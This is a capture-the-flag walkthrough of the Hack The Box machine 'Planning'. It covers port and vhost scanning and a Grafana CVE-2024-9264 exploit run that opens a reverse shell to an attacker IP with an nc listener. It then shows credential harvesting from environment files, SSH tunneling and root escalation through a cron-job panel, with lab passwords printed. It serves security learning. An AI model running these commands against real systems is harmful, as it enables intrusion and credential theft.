Planning

Machine Information

As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r

Recon

Nmap

First, recon the ip with nmap and get the ports open -->

nmap -p- --open -sCV 10.10.11.68 -oG allPorts
#################################################
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

In :80 are basic virtual hostin planning.htb

Web

gobuster dir -u http://planning.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 80 -x txt,html,php,js,json
===============================================================
/index.php            (Status: 200) [Size: 23914]
/about.php            (Status: 200) [Size: 12727]
/contact.php          (Status: 200) [Size: 10632]
/img                  (Status: 301) [Size: 178] [--> http://planning.htb/img/]
/detail.php           (Status: 200) [Size: 13006]
/css                  (Status: 301) [Size: 178] [--> http://planning.htb/css/]
/lib                  (Status: 301) [Size: 178] [--> http://planning.htb/lib/]
/js                   (Status: 301) [Size: 178] [--> http://planning.htb/js/]
/course.php           (Status: 200) [Size: 10229]
/enroll.php           (Status: 200) [Size: 7053]

course.php & enroll.php

JUM... strange... try with subdomains -->

Subdomains Enum

gobuster vhost -u http://planning.htb -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt --append-domain -t 40
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]

Add it into /etc/hosts

Hack the Box give us a commend with a username and passwod = admin / 0D5oT70Fq13EvB5r

Grafana v11.0.0

Exploit

GitHub - xunthin99/plagiarized-CVE-2024-9264-RCE-Exploit: an exploit someone plagiarized from meGitHub

python3 poc.py --url http://grafana.planning.htb/login/ --username admin --password 0D5oT70Fq13EvB5r --reverse-ip 10.10.14.90 --reverse-port 4444
## NC
nc -lvnp 4444

Nice! With the IP we can see we are inside docker, so... we need scape with it -->

Docker Scape

Inside the file #env we can see credentials -->

enzo:RioTecRANDEntANT!

SSH Conecction

ssh enzo@10.10.11.68

Root Flag

We can see a interal local port running to 8000, maybe web interface, do ssh tunneling -->

SSH Tunneling

ssh 8000:127.0.0.1:8000 enzo@10.10.11.68

With it, i go to the browser and search 127.0.0.1:8000. We can see a Basic Login Panel -->

Im going to search same one credential insede the host with the session of enzo, and i found a crendential into /var/www/web --->

root:EXTRapHY

Im going another to the website :8000 and login with this crendentials.. but nothing... Search more -->

Password = P4ssw0rdS0pRi0T3c

Try to login into the web site :8000 -->

root : P4ssw0rdS0pRi0T3c

We can create a new "Job" and set a command -->

Before execute, we can go to /tmp/ and see bash, and excute bash -p to get root -->

PreviousNocturnal NextEra

Last updated 1 month ago